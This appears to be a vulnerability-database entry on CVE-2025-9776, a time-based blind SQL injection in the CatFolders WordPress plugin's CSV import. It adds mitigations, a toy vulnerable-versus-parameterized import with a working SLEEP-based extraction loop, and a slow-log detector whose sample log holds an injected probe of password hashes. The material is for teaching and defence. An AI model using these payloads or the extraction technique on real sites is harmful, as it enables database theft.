CVE-2025-9776: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in catfolders CatFolders – Tame Your WordPress Media Library by Category
The CatFolders – Tame Your WordPress Media Library by Category plugin for WordPress is vulnerable to time-based SQL Injection via the CSV Import contents in all versions up to, and including, 2.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
AI Analysis
Technical Summary
CVE-2025-9776 is a medium-severity SQL Injection vulnerability (CWE-89) in the WordPress plugin 'CatFolders – Tame Your WordPress Media Library by Category', affecting all versions up to and including 2.5.2. The plugin's CSV Import feature takes values from the uploaded file and uses them in an existing database query without sufficient escaping and without preparing the query (in WordPress terms, the value is concatenated into the SQL string rather than passed through $wpdb->prepare()). An authenticated user with the Author role or higher can therefore place SQL in a CSV cell and have it executed as part of that query.
The injection is time-based, which means it is blind: the query's results are never shown to the attacker. Data is instead inferred one condition at a time by making the database pause when a guessed condition is true (MySQL's SLEEP() and BENCHMARK() are the usual primitives) and measuring the delay in the HTTP response. This is slower than an error- or union-based injection, but it is easily automated and still yields the full contents of any table the database user can read.
No user interaction beyond the attacker's own authentication is needed, the attack vector is the network, and attack complexity is low. The impact is on confidentiality: the attacker can read data from the database, with no impact on integrity or availability recorded in the advisory. The CVSS v3.1 base score is 6.5 (Medium), consistent with the vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N. No exploitation in the wild had been reported as of publication.
The Author-level requirement limits the exposed population to accounts that already have some trust on the site, but on multi-author sites, or where contributor accounts are handed out loosely, that population can be large, and a single compromised or malicious Author account is enough. No patch or fixed version is linked in this record, so until one is published mitigation rests on access control, disabling the import feature where possible, and monitoring.
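The following is an added example, not code from the CatFolders plugin or from the advisory, showing the mechanism the summary describes: a toy CSV import handler that splices a cell from the uploaded file into a lookup query, the same handler with the value bound as a parameter (the $wpdb->prepare() pattern in WordPress), and the time-based blind oracle an attacker drives through the vulnerable version to read a value one character at a time. SQLite stands in for MySQL/MariaDB and a registered SLEEP() user function stands in for MySQL's SLEEP(); the schema, table and column names, and the 'secret' value are constructed for the example and are not CatFolders'.

```python
"""
Added example, not code from CatFolders or the advisory: a toy CSV import
handler with the CWE-89 pattern beside its parameterized fix, and the
time-based blind oracle an attacker drives through it.

Assumptions: SQLite stands in for MySQL/MariaDB, and a registered SLEEP()
user function stands in for MySQL's SLEEP(); the schema and the secret
value are constructed for this example.
"""
import csv
import io
import sqlite3
import time

DELAY = 0.1  # seconds the stand-in SLEEP() pauses; real probes use longer delays


def open_db():
    """Constructed schema: a folder table plus an options table with a secret."""
    conn = sqlite3.connect(":memory:")

    def fake_sleep(seconds):
        # Mimics MySQL SLEEP(n): pause n seconds, return 0.
        time.sleep(float(seconds))
        return 0

    conn.create_function("SLEEP", 1, fake_sleep)
    conn.executescript("""
        CREATE TABLE folders(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE options(name TEXT, value TEXT);
        INSERT INTO folders(name) VALUES ('Logos'), ('Banners');
        INSERT INTO options VALUES ('api_key', 'c0de');
    """)
    return conn


def csv_with_names(*names):
    """Build a one-column CSV the way an Author would upload it (properly quoted)."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["name"])
    for name in names:
        writer.writerow([name])
    return buf.getvalue()


def import_vulnerable(conn, csv_text):
    """Vulnerable: the CSV cell is spliced into the SQL string, so anything
    after a closing quote in the cell becomes SQL."""
    found = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        sql = "SELECT id FROM folders WHERE name = '" + row["name"] + "'"
        found.append(conn.execute(sql).fetchone())
    return found


def import_hardened(conn, csv_text):
    """Hardened: the cell is a bound parameter and is only ever compared as data.
    The WordPress equivalent is $wpdb->prepare("... WHERE name = %s", $name)."""
    found = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        found.append(conn.execute("SELECT id FROM folders WHERE name = ?",
                                  (row["name"],)).fetchone())
    return found


def timed_import(conn, importer, csv_text):
    """Seconds the import took: the only signal a time-based attacker gets."""
    start = time.monotonic()
    importer(conn, csv_text)
    return time.monotonic() - start


def extract_secret(conn, max_len=8, alphabet="0123456789abcdef"):
    """Time-based blind extraction through import_vulnerable(): one CSV row per
    guess, and the guess is confirmed only by whether the import stalled."""
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "x' OR (SELECT CASE WHEN substr(value,%d,1)='%s' THEN SLEEP(%s) "
                "ELSE 0 END FROM options WHERE name='api_key')-- -" % (pos, ch, DELAY)
            )
            if timed_import(conn, import_vulnerable, csv_with_names(payload)) >= DELAY / 2:
                secret += ch
                break
        else:
            break  # no character matched at this position: end of the value
    return secret


if __name__ == "__main__":
    db = open_db()
    probe = csv_with_names("x' OR SLEEP(%s)-- -" % DELAY)
    print("vulnerable import stalled for %.2fs" % timed_import(db, import_vulnerable, probe))
    print("hardened import stalled for   %.4fs" % timed_import(db, import_hardened, probe))
    print("secret recovered blind:", extract_secret(db))
```

Running the script shows the vulnerable import stalling for the probe row while the parameterized import returns immediately, and the blind loop recovering the constructed secret from nothing but timing. The attacker never sees query output, and the fix that matters is not adding slashes to the cell but keeping the cell out of the SQL text entirely, which is what binding (or $wpdb->prepare() with a %s placeholder) does.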
Potential Impact
For European organizations, exploitation could disclose data held in the WordPress database: user records (including the password hashes in the users table, which can be cracked offline and reused against other accounts), media metadata, and any other content stored alongside the plugin's data. Because the attacker must already hold an Author-level or higher account, the risk is highest on sites with many contributors or editors, or where such accounts are shared or weakly protected. Exposure of personal data would engage GDPR obligations on confidentiality and breach handling, with the attendant regulatory fines, reputational damage and disruption. Extracted data can also seed follow-on attacks such as targeted phishing or credential reuse against other systems. The vulnerability does not directly affect integrity or availability, but the confidentiality impact alone warrants attention. Organizations running WordPress with this plugin should weigh the risk against how their roles are assigned and how sensitive the data on the site is.
Mitigation Recommendations
1. Restrict Author-level and higher roles to trusted users, and remove or downgrade accounts that do not need them; every Author account is a potential entry point.
2. Enforce least privilege for WordPress roles and review role assignments regularly.
3. Audit CSV import activity and database query logs for signs of injection: delay functions such as SLEEP() or BENCHMARK() in query text, and queries that take seconds while examining few rows, are characteristic of time-based probing.
4. Disable the CatFolders CSV Import feature, if feasible, until a fixed version is released.
5. Use a WAF with rules for SQL Injection patterns on the plugin's endpoints, bearing in mind that here the payload travels inside the uploaded CSV body, so the WAF must inspect multipart upload contents, and that blind payloads are readily obfuscated; treat this as defense in depth, not a fix.
6. Keep WordPress core and all plugins updated, and watch for a CatFolders release that addresses this vulnerability; apply it promptly.
7. Train content authors and editors on the responsibilities that come with elevated roles and on account hygiene (unique passwords, MFA where available).
8. Isolate WordPress instances and their databases (a dedicated database user with no grants beyond the site's own database, separate network segment) to limit what an attacker can reach through the injection.
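As an added example for the monitoring items above (not part of the advisory or the plugin), the script below parses MySQL slow query log entries and flags the signature of time-based probing: a delay primitive in the query text, a comment sequence that has swallowed the query's original closing quote, and a query that took seconds while examining almost no rows. The log entries, user name and table names are constructed for the example; the entry layout follows the standard MySQL slow log format. A slow query on its own is not flagged, which is the edge case the third constructed entry exercises.

```python
"""
Added example (not from the advisory or the CatFolders plugin): scan MySQL
slow query log entries for the signature of time-based SQL injection.
The log text, user and table names are constructed; the entry layout is
the standard MySQL slow log format.
"""
import re

SAMPLE_SLOW_LOG = """\
# Time: 2025-09-11T04:30:01.000000Z
# User@Host: wpuser[wpuser] @ localhost []  Id:    17
# Query_time: 0.000412  Lock_time: 0.000018 Rows_sent: 1  Rows_examined: 1
SET timestamp=1757565001;
SELECT id FROM wp_example_folders WHERE name = 'Banners';
# Time: 2025-09-11T04:30:09.000000Z
# User@Host: wpuser[wpuser] @ localhost []  Id:    17
# Query_time: 5.000871  Lock_time: 0.000020 Rows_sent: 0  Rows_examined: 1
SET timestamp=1757565009;
SELECT id FROM wp_example_folders WHERE name = 'x' OR (SELECT CASE WHEN SUBSTR(user_pass,1,1)='$' THEN SLEEP(5) ELSE 0 END FROM wp_users WHERE ID=1)-- -';
# Time: 2025-09-11T04:30:15.000000Z
# User@Host: wpuser[wpuser] @ localhost []  Id:    18
# Query_time: 3.200000  Lock_time: 0.000010 Rows_sent: 10  Rows_examined: 250000
SET timestamp=1757565015;
SELECT * FROM wp_postmeta WHERE meta_key LIKE '%thumb%';
"""

# MySQL functions that make a query wait; the core of a time-based probe.
DELAY_PRIMITIVE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)
# A '--' comment followed by a lone quote at the end of the statement: the
# attacker's comment swallowed the quote the application appended.
SWALLOWED_QUOTE = re.compile(r"--[^\n]*'\s*;?\s*$")
STATS = re.compile(r"Query_time: ([\d.]+).*Rows_sent: (\d+)\s+Rows_examined: (\d+)")


def parse_slow_log(text):
    """Split slow log text into entries: time, user, timing stats and SQL."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.startswith("# Time:"):
            if cur:
                entries.append(cur)
            cur = {"time": line.split(":", 1)[1].strip(), "sql": []}
        elif cur is None:
            continue  # text before the first entry
        elif line.startswith("# User@Host:"):
            cur["user"] = line.split(":", 1)[1].split("@")[0].strip()
        elif line.startswith("# Query_time:"):
            m = STATS.search(line)
            cur["query_time"] = float(m.group(1))
            cur["rows_sent"] = int(m.group(2))
            cur["rows_examined"] = int(m.group(3))
        elif line.startswith("#") or line.startswith("SET timestamp") or line.lower().startswith("use "):
            continue  # header or session bookkeeping, not the logged query
        else:
            cur["sql"].append(line)
    if cur:
        entries.append(cur)
    for e in entries:
        e["sql"] = "\n".join(e["sql"])
    return entries


def classify(entry, slow_threshold=1.0, few_rows=100):
    """Reasons to suspect an entry; an empty list means nothing suspicious.
    Slowness alone is not a reason: a slow query that examined many rows is
    just a slow query."""
    reasons = []
    if DELAY_PRIMITIVE.search(entry["sql"]):
        reasons.append("delay primitive (SLEEP/BENCHMARK) in query text")
    if SWALLOWED_QUOTE.search(entry["sql"]):
        reasons.append("'--' comment followed by a dangling closing quote")
    if reasons and entry["query_time"] >= slow_threshold and entry["rows_examined"] < few_rows:
        reasons.append("took %.1fs while examining only %d rows: delay is synthetic"
                       % (entry["query_time"], entry["rows_examined"]))
    return reasons


def scan(text):
    """Return the suspicious entries, each annotated with its reasons."""
    hits = []
    for entry in parse_slow_log(text):
        reasons = classify(entry)
        if reasons:
            hits.append(dict(entry, reasons=reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_SLOW_LOG):
        print(hit["time"], hit["user"])
        for reason in hit["reasons"]:
            print("   -", reason)
        print("   ", hit["sql"][:80])
```

The slow log only captures queries above long_query_time, so set that threshold at or below the delay you expect probes to use (attack tooling commonly sleeps for several seconds per guess). Correlating the flagged entries' timestamps with the web server's access log for the plugin's import requests, and with the WordPress user who performed the import, turns a suspicious query into an attributable event.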
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: Wordfence
- Date Reserved: 2025-08-31T22:14:46.514Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 68c2513d729aac9ae34ee3bb
Added to database: 9/11/2025, 4:34:05 AM
Last enriched: 9/11/2025, 4:34:21 AM
Last updated: 9/11/2025, 5:38:53 AM
Related Threats
- CVE-2025-9874: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in webcodingplace Ultimate Classified Listings (High)
- CVE-2025-9861: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in livingos ThemeLoom Widgets (Medium)
- CVE-2025-9860: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in natata7 Mixtape (Medium)
- CVE-2025-9855: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in zuotian Enhanced BibliPlug (Medium)
- CVE-2025-9693: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in khaledsaikat User Meta – User Profile Builder and User management plugin (High)